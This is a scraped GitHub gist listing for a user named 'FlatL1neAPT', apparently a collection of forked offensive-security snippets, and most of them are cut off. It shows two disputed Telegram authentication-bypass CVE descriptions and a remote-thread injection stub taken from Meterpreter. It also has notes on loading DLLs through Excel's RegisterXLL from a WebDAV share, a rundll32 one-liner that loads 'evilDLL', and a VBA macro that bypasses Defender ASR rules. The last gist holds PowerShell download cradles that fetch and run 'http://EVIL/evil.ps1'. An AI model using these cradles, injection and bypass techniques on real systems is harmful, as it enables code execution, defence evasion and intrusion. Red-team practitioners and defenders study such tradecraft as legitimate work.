I hereby claim:
- I am FlatL1neAPT on github.
- I am underground (https://keybase.io/underground) on keybase.
- I have a public key whose fingerprint is 0875 D092 F495 5239 6070 0D70 148E 43C4 C8E4 8E2E
To claim this, I am signing this object:
FlatL1neAPT
/ keybase.md
Created
November 20, 2017 16:30
FlatL1neAPT
/ CVE-2018-15543.txt
Created
October 28, 2018 11:04
— forked from tanprathan/CVE-2018-15543.txt
Telegram CVE-2018-15543 Information
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| > [Description] | |
| > ** DISPUTED ** An issue was discovered in the org.telegram.messenger | |
| > application 4.8.11 for Android. The FingerprintManager class for | |
| > Biometric validation allows authentication bypass through the callback | |
| > method from onAuthenticationFailed to onAuthenticationSucceeded with | |
| > null, because the fingerprint API in conjunction with the | |
| > Android keyGenerator class is not implemented. In other words, an | |
| > attacker could authenticate with an arbitrary fingerprint. NOTE: the | |
| > vendor indicates that this is not an attack of interest within the | |
| > context of their threat model, which excludes Android devices on which |
FlatL1neAPT
/ CVE-2018-15542.txt
Created
October 28, 2018 11:04
— forked from tanprathan/CVE-2018-15542.txt
Telegram CVE-2018-15542 Information
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| > [Description] | |
| > ** DISPUTED ** An issue was discovered in the org.telegram.messenger | |
| > application 4.8.11 for Android. The Passcode feature allows | |
| > authentication bypass via runtime manipulation that forces a certain | |
| > method's return value to true. In other words, an attacker could | |
| > authenticate with an arbitrary passcode. NOTE: the vendor indicates | |
| > that this is not an attack of interest within the context of their | |
| > threat model, which excludes Android devices on which rooting has | |
| > occurred. | |
| > |
FlatL1neAPT
/ sedebug_rtlcreatethread.c
Created
October 28, 2018 11:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c */ | |
| #include <windows.h> | |
| #include <stdio.h> | |
| typedef DWORD(WINAPI *prototype_RtlCreateUserThread)( | |
| HANDLE ProcessHandle, | |
| PSECURITY_DESCRIPTOR SecurityDescriptor, | |
| BOOL CreateSuspended, | |
| ULONG StackZeroBits, | |
| PULONG StackReserved, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Net.Sockets; | |
FlatL1neAPT
/ ExcelXLL.md
Created
October 28, 2018 11:24
— forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
FlatL1neAPT
/ excel.bat
Created
October 28, 2018 11:24
— forked from Ridter/excel.bat
Execute DLL via the Excel.Application object's RegisterXLL() method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM rundll32 mshtml.dll HTA one-liner command: | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
FlatL1neAPT
/ ASR Rules Bypass.vba
Created
January 11, 2019 14:47
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
FlatL1neAPT
/ keybase.md
Created
January 14, 2019 05:08
I hereby claim:
- I am FlatL1neAPT on github.
- I am underground (https://keybase.io/underground) on keybase.
- I have a public key whose fingerprint is E8D6 2068 1BD8 05A9 874A F718 02BC 1C2C 0C68 EDD1
To claim this, I am signing this object:
FlatL1neAPT
/ DownloadCradles.ps1
Created
January 15, 2019 13:36
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
OlderNewer